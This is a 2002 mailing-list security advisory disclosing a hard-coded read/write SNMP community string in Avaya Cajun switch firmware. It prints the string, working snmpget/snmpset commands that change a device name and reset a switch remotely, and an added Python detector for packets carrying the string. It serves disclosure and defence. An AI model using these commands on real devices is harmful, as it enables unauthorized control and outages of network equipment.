[NEWS] SNMP Vulnerability in Avaya Cajun
From: support@securiteam.com
Date: 08/13/02
From: support@securiteam.com To: list@securiteam.com Date: Tue, 13 Aug 2002 15:40:33 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SNMP Vulnerability in Avaya Cajun
------------------------------------------------------------------------
SUMMARY
There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
the device to administer it.
DETAILS
Vulnerable systems:
* Avaya Cajun P330T software version 3.8.2 and 3.9.1
* Avaya Cajun P333R software version 3.8.1 and 3.9.1
Additionally, firmware for P130, M770-ATM and M770 Supervisor (M-SPX,
M-SPS) was found to be vulnerable.
Details:
Various Cajun firmware versions contain an undocumented r/w community string:
NoGaH$@!
To test, try:
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'
system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)
If the above works, you can for example reset a Cajun switch remotely:
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1
Recommendations:
As always it is good administrative practice to block SNMP at the
firewall, especially now after the release of the PROTOS SNMP testing
suite. However, the vulnerability is also present on P333R router
interfaces, which have a higher chance of being exposed to the outside
world:
sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4
If for some reason the user is unable to upgrade to a fixed version, in
order to mitigate the bug one can restrict SNMP access using the 'set
allowed managers' command, which appeared in recent Cajun firmware.
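For monitoring, the check below flags any SNMPv1/v2c packet that carries this community string and reports whether it is a set request. It is an added example, not part of the original advisory; the function names and the constructed sample packets are assumptions for illustration.

```python
"""Flag SNMPv1/v2c packets that carry the undocumented Cajun community string."""

BACKDOOR_COMMUNITY = b"NoGaH$@!"          # string published in the advisory
PDU_NAMES = {0xA0: "get", 0xA1: "getnext", 0xA2: "response", 0xA3: "set"}


def read_tlv(buf, pos):
    """Decode one BER TLV at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits = count of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[pos:pos + length], pos + length


def inspect(payload):
    """Return (community, pdu_name, alert) for a UDP/161 payload, else None."""
    try:
        tag, body, _ = read_tlv(payload, 0)
        if tag != 0x30:                    # message must be an outer SEQUENCE
            return None
        vtag, version, pos = read_tlv(body, 0)
        ctag, community, pos = read_tlv(body, pos)
        if vtag != 0x02 or ctag != 0x04 or version not in (b"\x00", b"\x01"):
            return None                    # not SNMPv1 (0) or v2c (1)
        if pos >= len(body):
            raise ValueError("missing PDU")
        pdu = PDU_NAMES.get(body[pos], "other")
    except ValueError:
        return None
    return community, pdu, community == BACKDOOR_COMMUNITY


def build_v1(community, pdu_tag):
    """Constructed sample: minimal SNMPv1 message naming sysName.0 (value left NULL)."""
    varbind = b"\x30\x0c\x06\x08\x2b\x06\x01\x02\x01\x01\x05\x00\x05\x00"
    pdu_body = b"\x02\x01\x01\x02\x01\x00\x02\x01\x00\x30" + bytes([len(varbind)]) + varbind
    pdu = bytes([pdu_tag, len(pdu_body)]) + pdu_body
    msg = b"\x02\x01\x00\x04" + bytes([len(community)]) + community + pdu
    return b"\x30" + bytes([len(msg)]) + msg
```

Pass `inspect()` the UDP payloads of traffic destined for port 161, taken from a capture or sensor; an alert on a "set" PDU indicates an attempted configuration change using the undocumented string.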
Vendor status:
Avaya was informed on 27 May 2002. The vendor responded on May 28 2002. As
the vendor proved responsive and worked promptly on the problem, Jacek
Lipkowski and Avaya agreed to release the information after the
release of fixed software. The fixed software was released on July 4,
and is available from the Avaya support site, http://support.Avaya.com.
Official Avaya security advisories are located at
http://support.Avaya.com/security/.
ADDITIONAL INFORMATION
The information has been provided by Jacek Lipkowski
<sq5bpf@andra.com.pl>.